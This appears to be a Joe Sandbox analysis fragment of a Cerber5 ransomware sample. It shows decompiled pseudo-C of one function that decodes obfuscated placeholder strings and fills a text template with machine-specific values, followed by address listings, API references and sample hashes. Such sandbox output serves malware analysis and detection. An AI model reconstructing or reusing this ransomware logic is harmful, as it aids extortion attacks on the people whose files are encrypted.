                                                                                                                                                                                        				signed int _v60;
                                                                                                                                                                                        				char _v71;
                                                                                                                                                                                        				signed int _v72;
                                                                                                                                                                                        				char _v83;
                                                                                                                                                                                        				signed int _v84;
                                                                                                                                                                                        				char _v95;
                                                                                                                                                                                        				char _v96;
                                                                                                                                                                                        				char _v107;
                                                                                                                                                                                        				int _v108;
                                                                                                                                                                                        				void* _v119;
                                                                                                                                                                                        				signed int _v120;
                                                                                                                                                                                        				void* _v124;
                                                                                                                                                                                        				intOrPtr _v128;
                                                                                                                                                                                        				intOrPtr _v132;
                                                                                                                                                                                        				intOrPtr _v136;
                                                                                                                                                                                        				intOrPtr _v140;
                                                                                                                                                                                        				intOrPtr _v144;
                                                                                                                                                                                        				intOrPtr _v148;
                                                                                                                                                                                        				intOrPtr _v152;
                                                                                                                                                                                        				intOrPtr _v156;
                                                                                                                                                                                        				intOrPtr _v160;
                                                                                                                                                                                        				intOrPtr _v164;
                                                                                                                                                                                        				intOrPtr _v168;
                                                                                                                                                                                        				intOrPtr _v172;
                                                                                                                                                                                        				intOrPtr _v176;
                                                                                                                                                                                        				intOrPtr _v180;
                                                                                                                                                                                        				intOrPtr _v184;
                                                                                                                                                                                        				intOrPtr _v188;
                                                                                                                                                                                        				intOrPtr _v192;
                                                                                                                                                                                        				intOrPtr _v196;
                                                                                                                                                                                        				intOrPtr _v200;
                                                                                                                                                                                        				intOrPtr _v204;
                                                                                                                                                                                        				intOrPtr _v208;
                                                                                                                                                                                        				intOrPtr _v212;
                                                                                                                                                                                        				intOrPtr _v216;
                                                                                                                                                                                        				intOrPtr _v220;
                                                                                                                                                                                        				char _v224;
                                                                                                                                                                                        				intOrPtr _v228;
                                                                                                                                                                                        				intOrPtr _v232;
                                                                                                                                                                                        				intOrPtr _v236;
                                                                                                                                                                                        				intOrPtr _v240;
                                                                                                                                                                                        				char _v252;
                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                                        				signed int _t147;
                                                                                                                                                                                        				intOrPtr* _t148;
                                                                                                                                                                                        				char* _t150;
                                                                                                                                                                                        				int _t151;
                                                                                                                                                                                        				char* _t152;
                                                                                                                                                                                        				signed int _t153;
                                                                                                                                                                                        				char* _t154;
                                                                                                                                                                                        				signed int _t155;
                                                                                                                                                                                        				char* _t156;
                                                                                                                                                                                        				signed int _t157;
                                                                                                                                                                                        				char* _t158;
                                                                                                                                                                                        				signed int _t159;
                                                                                                                                                                                        				char* _t160;
                                                                                                                                                                                        				signed int _t161;
                                                                                                                                                                                        				char* _t162;
                                                                                                                                                                                        				char* _t164;
                                                                                                                                                                                        				signed int _t165;
                                                                                                                                                                                        				char* _t166;
                                                                                                                                                                                        				signed int _t167;
                                                                                                                                                                                        				char* _t168;
                                                                                                                                                                                        				signed int _t169;
                                                                                                                                                                                        				char* _t170;
                                                                                                                                                                                        				signed int _t171;
                                                                                                                                                                                        				char* _t172;
                                                                                                                                                                                        				signed int _t173;
                                                                                                                                                                                        				void* _t174;
                                                                                                                                                                                        				signed int _t175;
                                                                                                                                                                                        				char* _t176;
                                                                                                                                                                                        				signed int _t177;
                                                                                                                                                                                        				char* _t178;
                                                                                                                                                                                        				signed int _t179;
                                                                                                                                                                                        				char _t180;
                                                                                                                                                                                        				void* _t181;
                                                                                                                                                                                        				void* _t182;
                                                                                                                                                                                        				intOrPtr _t189;
                                                                                                                                                                                        				signed int _t190;
                                                                                                                                                                                        				void* _t192;
                                                                                                                                                                                        				signed int* _t195;
                                                                                                                                                                                        				intOrPtr _t199;
                                                                                                                                                                                        				void* _t202;
                                                                                                                                                                                        				void* _t209;
                                                                                                                                                                                        				signed int* _t212;
                                                                                                                                                                                        				intOrPtr _t225;
                                                                                                                                                                                        				intOrPtr _t226;
                                                                                                                                                                                        				char _t227;
                                                                                                                                                                                        				intOrPtr _t228;
                                                                                                                                                                                        				intOrPtr _t229;
                                                                                                                                                                                        				intOrPtr _t230;
                                                                                                                                                                                        				intOrPtr _t231;
                                                                                                                                                                                        				void* _t239;
                                                                                                                                                                                        				signed char* _t248;
                                                                                                                                                                                        				void* _t257;
                                                                                                                                                                                        				signed int _t273;
                                                                                                                                                                                        				void* _t276;
                                                                                                                                                                                        				signed int _t289;
                                                                                                                                                                                        				signed int _t291;
                                                                                                                                                                                        				signed int _t297;
                                                                                                                                                                                        				signed int _t302;
                                                                                                                                                                                        				char _t303;
                                                                                                                                                                                        				int _t304;
                                                                                                                                                                                        				int _t305;
                                                                                                                                                                                        				int _t306;
                                                                                                                                                                                        				char* _t317;
                                                                                                                                                                                        				void* _t318;
                                                                                                                                                                                        				void* _t319;
                                                                                                                                                                                        				void* _t320;
                                                                                                                                                                                        				void* _t321;
                                                                                                                                                                                        				void* _t322;
                                                                                                                                                                                        				void* _t323;
                                                                                                                                                                                        				void* _t324;
                                                                                                                                                                                        				void* _t325;
                                                                                                                                                                                        				void* _t326;
                                                                                                                                                                                        				void* _t327;
                                                                                                                                                                                        				void* _t328;
                                                                                                                                                                                        				void* _t329;
                                                                                                                                                                                        				void* _t330;
                                                                                                                                                                                        				void* _t331;
                                                                                                                                                                                        				void* _t332;
                                                                                                                                                                                        				void* _t333;
                                                                                                                                                                                        				void* _t334;
                                                                                                                                                                                        				intOrPtr _t342;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t302 = __edx;
                                                                                                                                                                                        				_t317 = __eax;
                                                                                                                                                                                        				_t303 =  *0x40f19c(__eax);
                                                                                                                                                                                        				_v12 = _t303;
                                                                                                                                                                                        				_v20 = _t303;
                                                                                                                                                                                        				_t147 = E004053B4(__ecx);
                                                                                                                                                                                        				_v24 = _t147;
                                                                                                                                                                                        				_v16 = _t147;
                                                                                                                                                                                        				if(_t303 != 0) {
                                                                                                                                                                                        					do {
                                                                                                                                                                                        						_t150 = E00405905(0x40d5a4, 0xa, 0x56bd498f);
                                                                                                                                                                                        						_t320 = _t319 + 0xc;
                                                                                                                                                                                        						_t151 = StrCmpNIA(_t317, _t150, 0xa);
                                                                                                                                                                                        						if(_t151 != 0) {
                                                                                                                                                                                        							_t288 = 8;
                                                                                                                                                                                        							_t152 = E00405905(0x40d5b4, _t288, 0x2722de43);
                                                                                                                                                                                        							_t321 = _t320 + 0xc;
                                                                                                                                                                                        							_t153 = StrCmpNIA(_t317, _t152, _t288);
                                                                                                                                                                                        							__eflags = _t153;
                                                                                                                                                                                        							if(_t153 != 0) {
                                                                                                                                                                                        								_t154 = E00405905(0x40d5c0, 0xc, 0xb14abe67);
                                                                                                                                                                                        								_t322 = _t321 + 0xc;
                                                                                                                                                                                        								_t155 = StrCmpNIA(_t317, _t154, 0xc);
                                                                                                                                                                                        								__eflags = _t155;
                                                                                                                                                                                        								if(__eflags != 0) {
                                                                                                                                                                                        									_t156 = E00405905(0x40d5d8, 4, 0xe25b1adf);
                                                                                                                                                                                        									_t323 = _t322 + 0xc;
                                                                                                                                                                                        									_t157 = StrCmpNIA(_t317, _t156, 4);
                                                                                                                                                                                        									__eflags = _t157;
                                                                                                                                                                                        									if(_t157 != 0) {
                                                                                                                                                                                        										_t304 = 7;
                                                                                                                                                                                        										_t158 = E00405905(0x40d5e4, _t304, 0xb3703cf2);
                                                                                                                                                                                        										_t324 = _t323 + 0xc;
                                                                                                                                                                                        										_t159 = StrCmpNIA(_t317, _t158, _t304);
                                                                                                                                                                                        										__eflags = _t159;
                                                                                                                                                                                        										if(_t159 != 0) {
                                                                                                                                                                                        											_t305 = 0xd;
                                                                                                                                                                                        											_t160 = E00405905(0x40d5ec, _t305, 0x21a218b0);
                                                                                                                                                                                        											_t325 = _t324 + 0xc;
                                                                                                                                                                                        											_t161 = StrCmpNIA(_t317, _t160, _t305);
                                                                                                                                                                                        											__eflags = _t161;
                                                                                                                                                                                        											if(_t161 != 0) {
                                                                                                                                                                                        												_t306 = 9;
                                                                                                                                                                                        												_t162 = E00405905(0x40d5fc, _t306, 0x9bb0187b);
                                                                                                                                                                                        												_t326 = _t325 + 0xc;
                                                                                                                                                                                        												__eflags = StrCmpNIA(_t317, _t162, _t306);
                                                                                                                                                                                        												if(__eflags != 0) {
                                                                                                                                                                                        													_t164 = E00405905(0x40d624, 0xd, 0x33cb5a3c);
                                                                                                                                                                                        													_t327 = _t326 + 0xc;
                                                                                                                                                                                        													_t165 = StrCmpNIA(_t317, _t164, 0xd);
                                                                                                                                                                                        													__eflags = _t165;
                                                                                                                                                                                        													if(_t165 != 0) {
                                                                                                                                                                                        														_t306 = 6;
                                                                                                                                                                                        														_t166 = E00405905( &E0040D634, _t306, 0x7becdfb7);
                                                                                                                                                                                        														_t328 = _t327 + 0xc;
                                                                                                                                                                                        														_t167 = StrCmpNIA(_t317, _t166, _t306);
                                                                                                                                                                                        														__eflags = _t167;
                                                                                                                                                                                        														if(_t167 != 0) {
                                                                                                                                                                                        															_t168 = E00405905( &E0040D63C, 5, 0xc8742f37);
                                                                                                                                                                                        															_t329 = _t328 + 0xc;
                                                                                                                                                                                        															_t169 = StrCmpNIA(_t317, _t168, 5);
                                                                                                                                                                                        															__eflags = _t169;
                                                                                                                                                                                        															if(_t169 != 0) {
                                                                                                                                                                                        																_t170 = E00405905(0x40d644, _t288, 0x1d904ab5);
                                                                                                                                                                                        																_t330 = _t329 + 0xc;
                                                                                                                                                                                        																_t171 = StrCmpNIA(_t317, _t170, _t288);
                                                                                                                                                                                        																__eflags = _t171;
                                                                                                                                                                                        																if(_t171 != 0) {
                                                                                                                                                                                        																	_t172 = E00405905(0x40d650, _t306, 0x32a36edb);
                                                                                                                                                                                        																	_t328 = _t330 + 0xc;
                                                                                                                                                                                        																	_t173 = StrCmpNIA(_t317, _t172, _t306);
                                                                                                                                                                                        																	_push(_t306);
                                                                                                                                                                                        																	__eflags = _t173;
                                                                                                                                                                                        																	if(_t173 != 0) {
                                                                                                                                                                                        																		_t174 = E00405905(0x40d658, _t306, 0x14143ff2);
                                                                                                                                                                                        																		_t331 = _t328 + 0xc;
                                                                                                                                                                                        																		_push(_t174);
                                                                                                                                                                                        																		_t175 = StrCmpNIA(_t317);
                                                                                                                                                                                        																		__eflags = _t175;
                                                                                                                                                                                        																		if(__eflags != 0) {
                                                                                                                                                                                        																			_t176 = E00405905( &E0040D660, _t306, 0x65d2c9e3);
                                                                                                                                                                                        																			_t332 = _t331 + 0xc;
                                                                                                                                                                                        																			_t177 = StrCmpNIA(_t317, _t176, _t306);
                                                                                                                                                                                        																			__eflags = _t177;
                                                                                                                                                                                        																			if(_t177 != 0) {
                                                                                                                                                                                        																				_t178 = E00405905(0x40d59c, _t306, 0x95a0a06d);
                                                                                                                                                                                        																				_t319 = _t332 + 0xc;
                                                                                                                                                                                        																				_t179 = StrCmpNIA(_t317, _t178, _t306);
                                                                                                                                                                                        																				__eflags = _t179;
                                                                                                                                                                                        																				if(_t179 != 0) {
                                                                                                                                                                                        																					_t294 = _v16;
                                                                                                                                                                                        																					_t180 =  *_t317;
                                                                                                                                                                                        																					_v16 = _v16 + 1;
                                                                                                                                                                                        																					_t317 =  &(_t317[1]);
                                                                                                                                                                                        																					_t139 =  &_v12;
                                                                                                                                                                                        																					 *_t139 = _v12 - 1;
                                                                                                                                                                                        																					__eflags =  *_t139;
                                                                                                                                                                                        																					 *_v16 = _t180;
                                                                                                                                                                                        																				} else {
                                                                                                                                                                                        																					_v120 = _t179;
                                                                                                                                                                                        																					asm("stosd");
                                                                                                                                                                                        																					asm("stosd");
                                                                                                                                                                                        																					asm("stosw");
                                                                                                                                                                                        																					_t181 = 0xa;
                                                                                                                                                                                        																					_t182 = E00406444(_t181, 1);
                                                                                                                                                                                        																					_t294 =  &_v120;
                                                                                                                                                                                        																					__eflags = _t182 + 1;
                                                                                                                                                                                        																					E00405DFA(_t182 + 1,  &_v120, _t302,  &_v120);
                                                                                                                                                                                        																					_t288 =  &_v16;
                                                                                                                                                                                        																					E004077C8( &_v20,  &_v16,  &_v120,  &_v24,  &_v120, 6);
                                                                                                                                                                                        																					_t319 = _t319 + 0x10;
                                                                                                                                                                                        																					goto L44;
                                                                                                                                                                                        																				}
                                                                                                                                                                                        																			} else {
                                                                                                                                                                                        																				_v72 = _t177;
                                                                                                                                                                                        																				asm("stosd");
                                                                                                                                                                                        																				asm("stosd");
                                                                                                                                                                                        																				asm("stosb");
                                                                                                                                                                                        																				_t189 =  *0x42fa58; // 0x3000
                                                                                                                                                                                        																				asm("cdq");
                                                                                                                                                                                        																				_t302 = _t302 & 0x00000fff;
                                                                                                                                                                                        																				_t190 = _t189 + _t302;
                                                                                                                                                                                        																				__eflags = _t190;
                                                                                                                                                                                        																				_push(_t190 >> 0xc);
                                                                                                                                                                                        																				_t192 = E00405905(0x40d5e0, 2, 0x3437bb9c);
                                                                                                                                                                                        																				_t333 = _t332 + 0xc;
                                                                                                                                                                                        																				_push(_t192);
                                                                                                                                                                                        																				_push( &_v72);
                                                                                                                                                                                        																				E00405ACD(_t288,  &_v71, _t317, _t190);
                                                                                                                                                                                        																				_t195 =  &_v72;
                                                                                                                                                                                        																				goto L41;
                                                                                                                                                                                        																			}
                                                                                                                                                                                        																		} else {
                                                                                                                                                                                        																			_v48 = _t175;
                                                                                                                                                                                        																			asm("stosd");
                                                                                                                                                                                        																			asm("stosd");
                                                                                                                                                                                        																			asm("stosb");
                                                                                                                                                                                        																			_t199 =  *0x42fa54; // 0x3000
                                                                                                                                                                                        																			asm("cdq");
                                                                                                                                                                                        																			_t302 = _t302 & 0x00000fff;
                                                                                                                                                                                        																			_push(_t199 + _t302 >> 0xc);
                                                                                                                                                                                        																			_t202 = E00405905(0x40d5e0, 2, 0x3437bb9c);
                                                                                                                                                                                        																			_t333 = _t331 + 0xc;
                                                                                                                                                                                        																			_push(_t202);
                                                                                                                                                                                        																			_push( &_v48);
                                                                                                                                                                                        																			E00405ACD(_t288,  &_v47, _t317, __eflags);
                                                                                                                                                                                        																			_t195 =  &_v48;
                                                                                                                                                                                        																			L41:
                                                                                                                                                                                        																			_t288 =  &_v16;
                                                                                                                                                                                        																			E004077C8( &_v20,  &_v16, _t294,  &_v24, _t195, 6);
                                                                                                                                                                                        																			_t319 = _t333 + 0x18;
                                                                                                                                                                                        																			L44:
                                                                                                                                                                                        																			_t317 =  &(_t317[6]);
                                                                                                                                                                                        																			_v12 = _v12 - 6;
                                                                                                                                                                                        																		}
                                                                                                                                                                                        																	} else {
                                                                                                                                                                                        																		_push( *0x42fa50);
                                                                                                                                                                                        																		goto L35;
                                                                                                                                                                                        																	}
                                                                                                                                                                                        																} else {
                                                                                                                                                                                        																	__eflags =  *0x42f79d - _t171;
                                                                                                                                                                                        																	_t103 =  *0x42f79d != _t171;
                                                                                                                                                                                        																	__eflags = _t103;
                                                                                                                                                                                        																	_push(_t171 & 0xffffff00 | _t103);
                                                                                                                                                                                        																	_t209 = E00405905(0x40d5b0, 2, 0xef6a5f2b);
                                                                                                                                                                                        																	_t334 = _t330 + 0xc;
                                                                                                                                                                                        																	_push(_t209);
                                                                                                                                                                                        																	_push( &_v252);
                                                                                                                                                                                        																	E00405ACD(_t288, _t306, _t317, _t103);
                                                                                                                                                                                        																	_t212 =  &_v252;
                                                                                                                                                                                        																	goto L32;
                                                                                                                                                                                        																}
                                                                                                                                                                                        															} else {
                                                                                                                                                                                        																_t288 =  &_v16;
                                                                                                                                                                                        																E004077C8( &_v20,  &_v16, _t294,  &_v24,  *0x42fa48, 5);
                                                                                                                                                                                        																_t319 = _t329 + 0xc;
                                                                                                                                                                                        																_t317 =  &(_t317[5]);
                                                                                                                                                                                        																_v12 = _v12 - 5;
                                                                                                                                                                                        															}
                                                                                                                                                                                        														} else {
                                                                                                                                                                                        															_t93 =  &(_t317[6]); // 0x6
                                                                                                                                                                                        															_t289 = StrToIntA(_t93);
                                                                                                                                                                                        															_t306 =  &((StrChrA(_t317, 0x7d))[1 - _t317]);
                                                                                                                                                                                        															__eflags = _t289 -  *0x42fa4c;
                                                                                                                                                                                        															if(_t289 >  *0x42fa4c) {
                                                                                                                                                                                        																_t289 = 1;
                                                                                                                                                                                        																__eflags = 1;
                                                                                                                                                                                        															}
                                                                                                                                                                                        															_t225 =  *0x42f83c; // 0x5ed4420
                                                                                                                                                                                        															_push(_t306);
                                                                                                                                                                                        															_t95 = _t289 * 4; // 0xabbababa
                                                                                                                                                                                        															_push( *((intOrPtr*)(_t225 + _t95 - 4)));
                                                                                                                                                                                        															goto L35;
                                                                                                                                                                                        														}
                                                                                                                                                                                        													} else {
                                                                                                                                                                                        														_t226 = 0x14;
                                                                                                                                                                                        														_v236 = _t226;
                                                                                                                                                                                        														_v232 = _t226;
                                                                                                                                                                                        														_t227 = 0x28;
                                                                                                                                                                                        														_v228 = _t227;
                                                                                                                                                                                        														_v224 = _t227;
														_t228 = 0x3c;
														_v220 = _t228;
														_v216 = _t228;
														_t229 = 0x50;
														_v212 = _t229;
														_v208 = _t229;
														_t230 = 0x64;
														_v204 = _t230;
														_v200 = _t230;
														_t231 = _t230 + 0x32;
														_v196 = _t231;
														_v192 = _t231;
														_v188 = 0xc8;
														_v184 = 0xc8;
														_v180 = 0xc8;
														_v176 = 0xfa;
														_v172 = 0x12c;
														_v168 = 0x12c;
														_v164 = 0x12c;
														_v160 = 0x15e;
														_v156 = 0x190;
														_v152 = 0x190;
														_v140 = 0x2ee;
														_v136 = 0x2ee;
														_t291 = 0;
														_v240 = 0;
														_v148 = 0x1c2;
														_v144 = 0x1f4;
														_v132 = 0x3e8;
														_v128 = 0x3e7;
														asm("stosd");
														_t239 = E0040AC85();
														_push(0);
														_push(0x40000000);
														_push(_t302);
														_push(_t239);
														L0040B7B6();
														_t297 = 0;
														__eflags = 0;
														do {
															__eflags = _t239 -  *((intOrPtr*)(_t318 + _t297 * 8 - 0xec));
															if(_t239 <  *((intOrPtr*)(_t318 + _t297 * 8 - 0xec))) {
																goto L20;
															} else {
																__eflags = _t239 -  *((intOrPtr*)(_t318 + _t297 * 8 - 0xe8));
																if(__eflags < 0) {
																	_t291 = _t297;
																} else {
																	goto L20;
																}
															}
															L23:
															_v96 = 0;
															asm("stosd");
															_push(_t291);
															asm("stosd");
															asm("stosb");
															_push(E00405905(0x40d5e0, 2, 0x3437bb9c));
															_push( &_v96);
															E00405ACD(_t291,  &_v95, _t317, __eflags);
															_t288 =  &_v16;
															E004077C8( &_v20,  &_v16, _t297,  &_v24,  &_v96, 0xd);
															_t319 = _t327 + 0x24;
															_t317 =  &(_t317[0xd]);
															_v12 = _v12 - 0xd;
															goto L46;
															L20:
															_t297 = _t297 + 1;
															__eflags = _t297 - 0xf;
														} while (__eflags < 0);
														goto L23;
													}
												} else {
													_t248 = E0040251C();
													_push(_t248[5] & 0x000000ff);
													_push(_t248[4] & 0x000000ff);
													_push(_t248[3] & 0x000000ff);
													_push(_t248[2] & 0x000000ff);
													_t294 = _t248[1] & 0x000000ff;
													_push(_t248[1] & 0x000000ff);
													_push( *_t248 & 0x000000ff);
													_push(E00405905(0x40d608, 0x18, 0x59315b46));
													_push( &_v224);
													E00405ACD(_t288, _t306, _t317, __eflags);
													_t288 =  &_v16;
													E004077C8( &_v20,  &_v16, _t248[1] & 0x000000ff,  &_v24,  &_v224, _t306);
													_t319 = _t326 + 0x38;
													goto L36;
												}
											} else {
												_push(_t305);
												_t257 = E00408107();
												goto L13;
											}
										} else {
											_push(_t304);
											_t257 = E00407076(_t288, _t294, _t304);
											L13:
											_push(_t257);
											L35:
											_push( &_v24);
											_t288 =  &_v16;
											E004077C8( &_v20,  &_v16, _t294);
											_t319 = _t328 + 0xc;
											L36:
											_t317 =  &(_t317[_t306]);
											_v12 = _v12 - _t306;
										}
									} else {
										_v84 = _t157;
										asm("stosd");
										asm("stosd");
										asm("stosb");
										_push(E004076BB());
										_push(E00405905(0x40d5e0, 2, 0x3437bb9c));
										_push( &_v84);
										E00405ACD(_t288,  &_v83, _t317, __eflags);
										_t288 =  &_v16;
										E004077C8( &_v20,  &_v16, _t294,  &_v24,  &_v84, 4);
										_t319 = _t323 + 0x24;
										_t317 =  &(_t317[4]);
										_v12 = _v12 - 4;
									}
								} else {
									_push( *0x40fc6c);
									_v36 = _t155;
									asm("stosd");
									asm("stosd");
									asm("stosb");
									_push(E00405905(0x40d5d0, 4, 0x7ef7fcfd));
									_push( &_v36);
									E00405ACD(_t288,  &_v35, _t317, __eflags);
									_t288 =  &_v16;
									E004077C8( &_v20,  &_v16, _t294,  &_v24,  &_v36, 0xc);
									_t319 = _t322 + 0x24;
									_t317 =  &(_t317[0xc]);
									_v12 = _v12 - 0xc;
								}
							} else {
								_v60 = _t153;
								asm("stosd");
								asm("stosd");
								asm("stosb"); // executed
								_t273 = E00405FC4(); // executed
								asm("sbb eax, eax");
								_push( ~( ~_t273));
								_t276 = E00405905(0x40d5b0, 2, 0xef6a5f2b);
								_t334 = _t321 + 0xc;
								_push(_t276);
								_push( &_v60);
								E00405ACD(_t288,  &_v59, _t317, __eflags);
								_t212 =  &_v60;
								L32:
								_t288 =  &_v16;
								E004077C8( &_v20,  &_v16, _t294,  &_v24, _t212,  &_v16);
								_t319 = _t334 + 0x18;
								_t317 =  &(_t317[8]);
								_v12 = _v12 - 8;
							}
						} else {
							_v108 = _t151;
							asm("stosd");
							asm("stosd");
							asm("stosb");
							_t342 =  *0x42f7a7; // 0x1
							_push(0 | _t342 != 0x00000000);
							_push(E00405905(0x40d5b0, 2, 0xef6a5f2b));
							_push( &_v108);
							E00405ACD(_t288,  &_v107, _t317, _t342);
                                                                                                                                                                                        							_t288 =  &_v16;
                                                                                                                                                                                        							E004077C8( &_v20,  &_v16, _t294,  &_v24,  &_v108, 0xa);
                                                                                                                                                                                        							_t319 = _t320 + 0x24;
                                                                                                                                                                                        							_t317 =  &(_t317[0xa]);
                                                                                                                                                                                        							_v12 = _v12 - 0xa;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						L46:
                                                                                                                                                                                        					} while (_v12 != 0);
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t148 = _a4;
                                                                                                                                                                                        				if(_t148 != 0) {
                                                                                                                                                                                        					 *_t148 = _v20;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _v24;
                                                                                                                                                                                        			}

                                                                                                                                                                                        0x00407f67
                                                                                                                                                                                        0x00407f6a
                                                                                                                                                                                        0x00407f6f
                                                                                                                                                                                        0x00407fcb
                                                                                                                                                                                        0x00407fcb
                                                                                                                                                                                        0x00407fce
                                                                                                                                                                                        0x00407fce
                                                                                                                                                                                        0x00407e82
                                                                                                                                                                                        0x00407e82
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00407e82
                                                                                                                                                                                        0x00407e10
                                                                                                                                                                                        0x00407e10
                                                                                                                                                                                        0x00407e16
                                                                                                                                                                                        0x00407e16
                                                                                                                                                                                        0x00407e19
                                                                                                                                                                                        0x00407e26
                                                                                                                                                                                        0x00407e2b
                                                                                                                                                                                        0x00407e2e
                                                                                                                                                                                        0x00407e35
                                                                                                                                                                                        0x00407e36
                                                                                                                                                                                        0x00407e3b
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00407e3b
                                                                                                                                                                                        0x00407dca
                                                                                                                                                                                        0x00407dd9
                                                                                                                                                                                        0x00407ddc
                                                                                                                                                                                        0x00407de1
                                                                                                                                                                                        0x00407de4
                                                                                                                                                                                        0x00407de7
                                                                                                                                                                                        0x00407de7
                                                                                                                                                                                        0x00407d70
                                                                                                                                                                                        0x00407d70
                                                                                                                                                                                        0x00407d7d
                                                                                                                                                                                        0x00407d8c
                                                                                                                                                                                        0x00407d8e
                                                                                                                                                                                        0x00407d94
                                                                                                                                                                                        0x00407d98
                                                                                                                                                                                        0x00407d98
                                                                                                                                                                                        0x00407d98
                                                                                                                                                                                        0x00407d99
                                                                                                                                                                                        0x00407d9e
                                                                                                                                                                                        0x00407d9f
                                                                                                                                                                                        0x00407d9f
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00407d9f
                                                                                                                                                                                        0x00407be2
                                                                                                                                                                                        0x00407be4
                                                                                                                                                                                        0x00407be5
                                                                                                                                                                                        0x00407beb
                                                                                                                                                                                        0x00407bf3
                                                                                                                                                                                        0x00407bf4
                                                                                                                                                                                        0x00407bfa
                                                                                                                                                                                        0x00407c02
                                                                                                                                                                                        0x00407c03
                                                                                                                                                                                        0x00407c09
                                                                                                                                                                                        0x00407c11
                                                                                                                                                                                        0x00407c12
                                                                                                                                                                                        0x00407c18
                                                                                                                                                                                        0x00407c20
                                                                                                                                                                                        0x00407c21
                                                                                                                                                                                        0x00407c27
                                                                                                                                                                                        0x00407c2d
                                                                                                                                                                                        0x00407c30
                                                                                                                                                                                        0x00407c36
                                                                                                                                                                                        0x00407c41
                                                                                                                                                                                        0x00407c47
                                                                                                                                                                                        0x00407c50
                                                                                                                                                                                        0x00407c56
                                                                                                                                                                                        0x00407c61
                                                                                                                                                                                        0x00407c67
                                                                                                                                                                                        0x00407c70
                                                                                                                                                                                        0x00407c76
                                                                                                                                                                                        0x00407c81
                                                                                                                                                                                        0x00407c87
                                                                                                                                                                                        0x00407c92
                                                                                                                                                                                        0x00407c98
                                                                                                                                                                                        0x00407c9e
                                                                                                                                                                                        0x00407ca5
                                                                                                                                                                                        0x00407cab
                                                                                                                                                                                        0x00407cb5
                                                                                                                                                                                        0x00407cbf
                                                                                                                                                                                        0x00407cc6
                                                                                                                                                                                        0x00407ccd
                                                                                                                                                                                        0x00407cce
                                                                                                                                                                                        0x00407cd3
                                                                                                                                                                                        0x00407cd4
                                                                                                                                                                                        0x00407cd9
                                                                                                                                                                                        0x00407cda
                                                                                                                                                                                        0x00407cdb
                                                                                                                                                                                        0x00407ce0
                                                                                                                                                                                        0x00407ce0
                                                                                                                                                                                        0x00407ce2
                                                                                                                                                                                        0x00407ce2
                                                                                                                                                                                        0x00407ce9
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00407ceb
                                                                                                                                                                                        0x00407ceb
                                                                                                                                                                                        0x00407cf2
                                                                                                                                                                                        0x00407cfc
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00407cf2
                                                                                                                                                                                        0x00407cfe
                                                                                                                                                                                        0x00407cfe
                                                                                                                                                                                        0x00407d07
                                                                                                                                                                                        0x00407d08
                                                                                                                                                                                        0x00407d0e
                                                                                                                                                                                        0x00407d16
                                                                                                                                                                                        0x00407d1f
                                                                                                                                                                                        0x00407d23
                                                                                                                                                                                        0x00407d24
                                                                                                                                                                                        0x00407d36
                                                                                                                                                                                        0x00407d39
                                                                                                                                                                                        0x00407d3e
                                                                                                                                                                                        0x00407d41
                                                                                                                                                                                        0x00407d44
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00407cf4
                                                                                                                                                                                        0x00407cf4
                                                                                                                                                                                        0x00407cf5
                                                                                                                                                                                        0x00407cf5
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00407cfa
                                                                                                                                                                                        0x00407b5a
                                                                                                                                                                                        0x00407b5a
                                                                                                                                                                                        0x00407b63
                                                                                                                                                                                        0x00407b68
                                                                                                                                                                                        0x00407b6d
                                                                                                                                                                                        0x00407b72
                                                                                                                                                                                        0x00407b73
                                                                                                                                                                                        0x00407b7a
                                                                                                                                                                                        0x00407b7b
                                                                                                                                                                                        0x00407b90
                                                                                                                                                                                        0x00407b97
                                                                                                                                                                                        0x00407b98
                                                                                                                                                                                        0x00407bac
                                                                                                                                                                                        0x00407baf
                                                                                                                                                                                        0x00407bb4
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00407bb4
                                                                                                                                                                                        0x00407b2b

                                                                                                                                                                                        APIs
                                                                                                                                                                                        • lstrlen.KERNEL32(00000000,00000000,00000000,00000000), ref: 004078FF
                                                                                                                                                                                        • StrCmpNIA.SHLWAPI(00000000,00000000,?,?,0000000A), ref: 00407938
                                                                                                                                                                                        • StrCmpNIA.SHLWAPI(00000000,00000000,?,?,00000008,?,?,0000000A), ref: 004079B2
                                                                                                                                                                                          • Part of subcall function 004077C8: lstrlen.KERNEL32(?,00000000,?,?,00407FC8,?,?,00000006,?,?,?,00000006,?,?,00000006), ref: 004077D2
                                                                                                                                                                                          • Part of subcall function 004077C8: lstrcpy.KERNEL32(?,?), ref: 0040780D
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: lstrlen$lstrcpy
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 805584807-0
                                                                                                                                                                                        • Opcode ID: b401ab38c0101cfb7659c94d98ab102cead8d602e935c577b57b34f79dc37e85
                                                                                                                                                                                        • Instruction ID: 818580fb1fba7dd59bef8428ed5c5f246a8211701d3eac6ac6326046513c75f4
                                                                                                                                                                                        • Opcode Fuzzy Hash: b401ab38c0101cfb7659c94d98ab102cead8d602e935c577b57b34f79dc37e85
